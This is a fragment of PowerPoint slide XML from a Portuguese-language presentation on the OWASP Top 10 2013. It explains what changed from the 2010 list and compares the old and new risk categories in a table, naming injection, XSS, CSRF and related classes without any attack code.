                  <a14:imgLayer r:embed="rId26">
                    <a14:imgEffect>
                      <a14:brightnessContrast bright="-20000" contrast="-40000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4129089" y="4638674"/>
            <a:ext cx="1752600" cy="416730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1406350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232787330"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="4333041"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>O </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>que</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>mudou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t> de 2010 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>para</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t> 2013?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="3952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aseline="0" dirty="0" smtClean="0"/>
                        <a:t>O </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cenário</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>ameaças</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>para</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>segurança</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> das </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>aplicações</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>muda</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>constantemente</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. Os principais fatores dessa evolução  são os avanços feitos pelos atacantes, o lançamento de novas tecnologias com novas vulnerabilidade, bem como a maior incorporação de defesas, e a implantação de sistemas cada vez mais complexos. Para acompanhar esta evolução, nós atualizamos periodicamente o OWASP Top 10. Nesta versão de 2013, fizemos as seguintes alterações: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900" kern="1200" baseline="0" dirty="0" smtClean="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US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Quebra de Autenticação e Gerenciamento de Sessão aumentou sua prevalência em nossa base de dados. Acreditamos que isto provavelmente ocorreu porque esta área está sendo analisada rigorosamente, e não porque é mais predominante. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Isso</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>resultou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>na</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>troca</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>posições</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> entre </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>os</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Riscos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> A2 e A3. </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endParaRPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="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US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Cross-Site Request Forgery (CSRF) reduziu sua prevalência em nossa base de dados de 2010-A5 para 2013-A8.  Acreditamos que a causa seja o fato do CSRF permanecer no OWASP Top 10 por 6 anos, e as organizações e os frameworks de desenvolvimento concentraram-se em reduzir significativamente o número de vulnerabilidades CSRF nas aplicações.</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endParaRPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="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US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Ampliamos a Falha na Restrição de Acesso a URL do OWASP Top 10 2010 para ser mais abrangente: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900" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="457200" marR="0" lvl="1" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
                        <a:buChar char="+"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>2010-A8: Falha na Restrição de Acesso a URL agora é </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" u="sng" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>2013-A7: Falta de Função para Controle do Nível de Acesso </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>– cobrindo todas as funções de controle do nível de acesso. Existem muitas maneiras de especificar qual função está sendo acessada, não apenas a URL.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="228600" marR="0" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicParenR" startAt="4"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Agrupamos e ampliamos 2010-A7 e 2010-A9 para CRIAR: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="sng" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>2013-A6:Exposição </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="sng" baseline="0" smtClean="0"/>
                        <a:t>de Dados </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="sng" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>S</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="sng" baseline="0" smtClean="0"/>
                        <a:t>ensíveis</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="sng"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900" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="457200" marR="0" lvl="1" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
                        <a:buChar char="–"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Esta é uma nova categoria criada com o agrupamento do 2010-A7 - Armazenamento Criptográfico Inseguro e 2010-A9 - Proteção Insuficiente no Nível de Transporte, além de adicionar riscos aos dados sensíveis inseridos via navegador. Esta nova categoria abrange proteção a dados sensíveis (exceto controle de acesso que é coberto pelos 2013-A4 e 2013-A7) a partir do momento que esses dados são fornecidos pelo usuário, enviados e armazenados pela aplicação, e em seguida enviados novamente ao navegador.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="228600" marR="0" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicParenR" startAt="5"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Adicionamos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="sng" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>2013-A9: Utilização de Componentes Vulneráveis Conhecidos</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="457200" marR="0" lvl="1" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
                        <a:buChar char="+"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Este assunto foi mencionado como parte do 2010-A6 - Configuração Incorreta de Segurança, mas agora possui uma categoria própria devido ao crescimento do desenvolvimento baseado em componentes, o que aumentou significativamente o risco de utilização de componentes vulneráveis conhecidos.</a:t>
                      </a:r>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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="73" name="Table 72"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3992800970"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5522844"/>
          <a:ext cx="6858000" cy="3501960"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{17292A2E-F333-43FB-9621-5CBBE7FDCDCB}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000"/>
                <a:gridCol w="3429000"/>
              </a:tblGrid>
              <a:tr h="152916">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP Top 10 – 2010 (Anterior)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP Top 10 – 2013 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(Novo)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="277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t>A1 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>Injeção</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>código</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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t>A1 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>Injeção</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>código</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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r h="277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t>A3 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Quebra</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>autenticação</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> e </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Gerenciamento</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Sessão</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="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t>A2 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Quebra</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>autenticação</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> e </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Gerenciamento</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Sessão</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="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r h="277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t>A2 – Cross-Site Scripting (XSS)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="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t>A3 – Cross-Site Scripting (XSS)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="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r h="277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t>A4 – Referência Insegura e Direta a Objetos</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="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t>A4 – Referência Insegura e Direta a Objetos</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="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noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="277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t>A6 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Configuração</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Incorreta</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Segurança</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="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t>A5 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Configuração</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Incorreta</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Segurança</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="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r h="277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t>A7 – Armazenamento Criptográfico Inseguro –</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Agrupado </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="269875" marR="0" indent="-269875" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>	com A9 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="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chemeClr val="tx2">
                        <a:lumMod val="25000"/>
                        <a:lumOff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t>A6 – Exposição de Dados Sensíveis</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="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chemeClr val="tx2">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="277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t>A8 – Falha na Restrição de Acesso a URL – Ampliado para </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="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chemeClr val="tx2">
                        <a:lumMod val="25000"/>
                        <a:lumOff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t>A7 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Falta</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Função</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>para</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Controle</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> do </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Nível</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Acesso</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="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chemeClr val="tx2">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="277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t>A5 – Cross-Site Request Forgery (CSRF)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="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t>A8 – Cross-Site Request Forgery (CSRF)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="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r h="277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t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Removido</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> do A6: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Configuração</a:t>
                      </a:r>
